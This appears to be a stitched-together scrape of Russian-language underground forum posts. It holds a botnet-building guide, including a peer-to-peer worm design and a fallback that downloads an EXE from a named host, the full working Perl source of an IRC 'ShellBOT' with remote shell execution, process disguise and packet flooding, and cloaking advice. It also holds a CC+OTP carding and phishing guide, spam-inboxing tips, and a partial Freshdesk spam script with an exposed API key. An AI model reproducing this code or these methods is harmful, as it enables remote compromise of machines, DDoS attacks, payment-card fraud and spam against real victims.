что покопайся с функциями SHGetSpecialFolderLocation() и
SHGetPathFromIDList(), через которые мы и узнаем все системные директории
Windows, думаю ты
без проблем
разберешься.
Что же касается XOR-шифрования, то и в PHP и C++ есть специальная функция.
Работает это примерно так:
ксоренный_текст=наш_текс^ключ_шифрования;
Короче говоря, символ "^" и является тем страшным ксором. Дешифровка производится точно также.
Плюсы [ + ], Минусы [ - ], Спорно/Нейтрал [~]:
[ + ] Удобное управление через скрипт. Боты сами коннектятся куда надо.
Можно реализовать достаточно многофункционального DDoS-бота. Все функции для
работы с HTTP
давным давно реализованы в WinAPI библиотеках.
[~] Боты довольно быстро попадают в антивирусные базы.
Хотя при правильном распространении и техник-стелсирования продержаться они
могут очень
долго
[~] Управление через IRC.
Управление через IRC - не самый сладкий "мед". Хотя многие так привыкли, что
на web их перетащить уже просто
невозможно
.
Кроме того, для написания системы управления через IRC надо разобраться с IRC-
протоколом
[~] Не так уж просто написать матерого бота.
Проблемы с файрволом, антивирусом, автозагрузкой + куча времени на написание
разных примочек...
c ботами спалят, то мигом закроют, а боты умрут... Но несмотря на это, бот
может быть намного функциональнее
чем ботнет на шеллах.
[ - ] Достаточно просто отследить куда коннектится бот.
Однажды мне попал в руки какой-то бот и адрес ботнет сервера я просек в логах
файрвола.
Итог: увел скудный ботнет.
[ - ] Тяжелый перенос ботнет сервера.
Придется заставлять ботов скачивать и запускать еще одного троя, а себя
грохнуть. Кроме того если сервер
c ботами спалят, то мигом закроют, а боты умрут... Но я тут поразмышлял и
пришел к такому алгоритму:
- чекаем cmd.txt на наличие команд
- если таковой файл есть, то парсим его и выполняем команды
- если сервак не пашет, то пытаемся приконнектиться еще раз и еще раз через
30 минут и т.д
- если совсем все фигово, то начинаем скачивать второй файл с какого-нибудь
b0tn3t.narod.ru
свою EXE'шки и запускать - работать будет
неплохо
+-------------------------+
| Децентрализованные сети |
+-------------------------+
Самым продвинутым вариантом управления ботами является распределенная
децентрализованная сеть. О сложности реализации такой
сети тоже можно говорить очень долго. Суть заключается в том, что каждая
зараженная машина коннетится с другой, постоянно
держав соединение с ней, благодаря этому все тачки передают команды друг
другу, то есть отсутствует центральный сервер! Для
того, чтобы заставить ботов выполнить какую-либо команду, достаточно
приконнектиться к какой-нибудь зараженной машине на
backdoor-порт и отдать команду, к пример icmp microsoft.com (ICMP-флуд
мелкомягких). Эта тачка разошлет сама всем команду.
Как тебе? Кроме того, можно (даже нужно) добавить сканирование IP-адресов на
наличие трояна в системе (по порту), хотя
это достаточно палевно. Сам пакет может быть "уникален" - иметь свою цифровую
подпись. Ну вот прикинем самую простую
децентрализованную сеть. У нас имеется локальная сеть 127.0.0.1 - 127.0.0.150.
В ней имеется 150 тачек. Допустим мы нашли
какую-то супер багу и написали червя (авторутер локалки
),
который бы сканил эти адреса на 31337-порт (там вертится бажный
сервис) и атаковал его, заливая и запуская свою копию на каждую машину. Итак,
сеть протроянена. Теперь, при каждом
автозапуске трояна биндится шелл на 800 порту, а каждый червь коннектится
со следующим, по следующему алгоритму:
[1] запускается скан на 127.0.0.2
[2] если порт 800 открыт, то коннетимся к нему и заставляем
коннетиться следующего на 127.0.02.
[3] если уже сконнетился кто-то ранее, то коннектимся на 127.0.0.03 и т.д
[4] повторяем на приконнекченной тачке то, что сделала та, что коннектится:
все с пункта #1 приплюсовав к IP + 1 =)
Это самая примтивиная схема. Можно научить ботов пополнять базу IP-адресов
захваченных машин, диапозонов IP-адрессов и т.д.
Честно говоря, реализаций таких методов ниразу не видел в паблик-источниках.
Но ходят слухи, что такая система реализована,
да и не один раз =) Так, что дерзай! Жду твоих работ! =))
Плюсы [ + ], Минусы [ - ], Спорно/Нейтрал [~]:
[ + ] Удобное управление.
Нет централизованной сети - мечта хакера. Чтобы заставить ботов выполнить что-
то достаточно отдать одному
соответствующую команду и он разошлет ее остальным ботам.
[ - ] Боты довольно быстро попадают в антивирусные базы + палевное
сканирование IP-адресов
Хотя при правильном распространении и техник-стелсирования продержаться они
могут очень
долго
Любой файр достаточно просто определит сканирование
портов
[ - ] Сложное написание.
За этой системой - будущее. Но реализовать задуманное не так-то просто. Делай
выводы.
[ + ] Практически невозможно отследить узел, откуда пошла команда
Анонимность гарантирована, но все равно VPN/Socks/Proxy не помешал
бы
Можно также отдать команду
зараженной машине через PHP-гейт, что даст возможность еще больше скрыть свою
причастность к
ботнету
[ + ] Стойкость ботнета
Как ты его разрушить захотел? Все зависит от пользователя.
Существует огромнейшое количество видов DoS-атак, например, SMURF-flooding,
SYN-flooding, UDP-flooding, ICMP-floodig, SMBDie
attack, Ping of Death, HTTP-flooding и т.д. Ни одним флудом ограничиваются
DoS-атаки. Как тебе уже известно, DoS (Denail of
Service) - это атака на отказ в обслуживании. DoS-атаку можно воспроизвести
при помощи какого-либо бага в программном
обеспечении. Таковым может выступать какой-нибудь Buffer Overflow-баг
(переполнение буффера) или зависание системы при
обработке каких-либо файлов.
Для DoS-багов специально пишутся эксплойты, но в ботах такая технология не
используется. Сейчас
я покажу как написать ICMP (ping) и HTTP (get)
Хороший шел бот для IRC
source
Code:Copy to clipboard
#!/usr/bin/perl
#
# ShellBOT - Atrix Team
#
# 0ldW0lf -
#
#
################ CONFIGURACAO #################################################################
my $processo = '/usr/sbin/inetd'; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $linas_max='10'; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep='3'; # ele dorme X segundos #
##################### IRC #####################################################################
my @adms=("Mafia_Boy","WorLD"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=("#.ShqiperiaBot."); # Caso haja senha ("#canal :senha") #
#----------------------------------------------################################################
my $nick= 'shqiptari'; # Nick do bot. Caso esteja em uso vai aparecer #
# aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = 'Long.Life.Ethnic.Albania'; # User ID #
#----------------------------------------------################################################
chop (my $realname = `id`); # Full Name #
#----------------------------------------------################################################
$servidor='irc.fiericlan.net' unless $servidor; # Servidor de irc que vai ser usado #
# caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta='6667'; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
my $VERSAO = '0.2';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!asc)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!asc" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
}
}
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diertório inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}v
copyright Atrix Team
Подскажите программу для автоматического сбора e-mail адресов по саитам и прогу для массовой рассылки по мылу!!!...
Приветствую тебя,
#user_name!
Более 10 лет я профессионально занимаюсь контекстной рекламой.
Работаю с такими платформами, как Google Ads, Bing Ads и Яндекс Директ.
Если есть вопросы — пиши , разберемся!
Важно: отвечаю только в теме, чтобы советы были полезны всем, а не только
в личной переписке. Это экономит время и делает общение более эффективным.
сабж) вопрос в теме
какой способ сейчас актуален по добычи инсталов? в сотношенние количество
затрат / время
пуши, сео, рассылки, фб/гугл,ломы
рассматриваю 3 варианта для пролива
Т.к. я уже тут, и мой гайд ходит по рукам, публикую полностью, для всех.
Это база знаний, которую необходимо на мой взгляд знать каждому, и нет, она не
устарела, а лишь приобрела еще большую актуальность, судя по вопросам в личке)
Все три части.
first: <https://telegra.ph/Inboxing-corp-mailsoutlook-Inboksim-
korpyautluk-02-03>
second: <https://telegra.ph/Inboxing-corp-mailsoutlook-Inboksim-korpyautluk-
CHast-2-02-22>
third <https://telegra.ph/Inboxing-corp-mailsoutlook-Inboksim-korpyautluk-
CHast-3-02-22>
Найлаждайтесь.
Google translator ready. Don't be shy, use it.
Привет, вопрос больше не в самом трафике, с этим проблем нет, а скорее в "креативах" и лендах на который он льется. Как вы льете на какие-то свои выдуманные проекты, либо же копирование популярных? Сейчас, проектов интересных не очень много выходит, поэтому интересно как делают другие. Понятно, что подробно свои наработки никто раскрывать не будет, но даже советы в какую сторону смотреть было бы неплохо получить
Доброго дня, товарищи !
В последнее время встала проблема "compromised site". из 15 запущенных аккаунтов 14 - compromised.
Вайты делаем вручную, домены строго .com, используем CF. Клоака - adspect -
интеграция через js.
Перебрал кучу всего - от содержимого сайта, до места покупки доменов.
Вроде бы нашёл решение - интеграция клоаки через php. Но в таком случае
компания запускается, откручивает пару дней и аккаунт банит за обход системы.
Посмотрел по чатикам, форумам - в основном советуют:
Проблема с "compromised" есть давно и я лично до сих пор не понимаю, с чем она может быть связана. Встречался с ней ранее, но менее массово. Тогда просто пересмотрели концепцию вайтов и всё стало хорошо. Сейчас же ничего не выходит.
Давайте обсудим !
Привет всем! Надеюсь, у вас всё отлично и вам будет интересно читать!
Сегодня обсудим тему CC+OTP — это один из самых бюджетных способов привлечения трафика в серую и черную тематику в мире дарка, который многие воспринимают с улыбкой, как новорожденного малыша! Итак, что же такое CC+OTP?
- CC (Credit Card) — это то, за что борются многие кардеры в дарке. Суть в том, что арбитражники стремятся получить доступ к данным кредитных карт и одноразовым паролям, которые приходят на телефон владельца. Это дает нам возможность совершать нелегальные транзакции, пока владелец не узнает, что происходит.
- OTP (One Time Password) — одноразовый пароль, который позволяет нам входить в личные кабинеты жертв и совершать с них транзакции. Может показаться, что ничего особенного, но это очень важный момент, и получить результат с первого раза не всегда удаётся.
Вот последовательность действий по CC+OTP:
1. Создайте оффер, через который будет идти ваш трафик, и выберите гео, на которое будете ориентироваться.
2. Подготовьте качественный и уникальный фиш с отстуком. Не ленитесь с этим — ваши заработки зависят от того, насколько хорош фиш, который привлечёт базового пользователя и даст вам логи для блокнота "Profit" (шутка).
3. Подготовьте всё под пролив: рекламные кампании, инструменты, воронки — короче, всё, что будет привлекать и заставлять людей переходить на ваш фиш.
4. Подберите вбиверов с мерчами. Это очень индивидуально, могу рассказать об этом подробнее в следующей статье. Можете использовать такие мерчи, как Banca Sella, Adyen, Wirecard и Erstes. Shopify тоже можно, но тут уже на свой страх и риск.
5. И вот мы дошли до самого главного — запускаем тестовый трафик и ждем первых результатов!
6. Анализируем полученные результаты. Если всё круто — масштабируем, если нет — заменяем оффер.
Совет: создайте несколько фишей для надёжности, чтобы лучше понимать текущие тренды рынка и принимать более взвешенные решения для дальнейшей работы.
В общем, я рассказал вам азы. Если вам понравилось, оставьте реакцию, чтобы я
знал, насколько вас это интересует. Также ищу инвесторов для создания и
продвижения офферов — если есть такие, пишите в личку!
**
Да статейка вышла не настолько большой как я думал, но обещаю исправить!**
Всем привет!
Посоветуйте пожалуйста бесплатный смтп чекер и валидатор баз
Есть ли вообще что-то нормальное кроме софта от Аелса
Собсна сабж
Здравствуйте.
Подскажите, пожалуйста - мне необходимо посылать около 300 сообщений на Корп
почты каждый день. Очень нужно, чтобы письма попадали в инбокс. Каким
инструментом это лучше реализовать?
Всех приветствую, с некоторых пор все активнее и активнее стал интересоваться
емейл спамом, но чем больше погружался в тему, тем больше вопросов возникало.
Сейчас тезисно опишу свой путь в емейл спаме, свои проблемы и свои целевые
векторы, буду рад получить критику / рекомендации.
Испробованные мной методы рассылки:
В целом буду рад любым замечаниям, критике, советам. Также с радостью пообщаюсь с людьми, кто тоже заинтересован в данной сфере с целью обмена опытом.
Всем доброго дня.
Долго думал о том с чего начать статью, и как ее преподнести.
Долго думал стоит ли... Но решился и пишу....
Итак начнем с того что спам это не только вебмайлинг смтп и какие-то
общепринятые понятия.
Спам это постоянный поиск- поиск инбокса, поиск того какое письмо сработает
сегодня.
Вот... дохрена воды помоему. Это не обучение спаму) Это помощь новичкам и тем
кто в тупике что стоит иногда просто оглянуться.
Итак начнем, существуют разные crm системы. Будет без линков чтобы хотябы
прожило чуть чуть.
Работать мы будем с системой
You must spend at least 60 day(s) on the forum to view the content.
freshworks.
Заходим в аккаунт.
Переходим во
You must spend at least 60 day(s) on the forum to view the content.
.freshdesk.com
Идем в профиль и смотрим апи ключ.
Код для того чтобы узнать лимиты:
You must spend at least 60 day(s) on the forum to view the content.
Python:Copy to clipboard
import requests
from requests.auth import HTTPBasicAuth
#Заменить на свое.
domain = "respshophelp.freshdesk.com"
api_key = "k9gmiYZS8oRbOc0leYI"
ticket_id = 152109 #Обязательно тикет который использвался почтой.
ticket_url = f"https://{domain}/api/v2/tickets/{ticket_id}"
auth = HTTPBasicAuth(api_key, "X")
ticket_response = requests.get(ticket_url, auth=auth)
if ticket_response.status_code == 200:
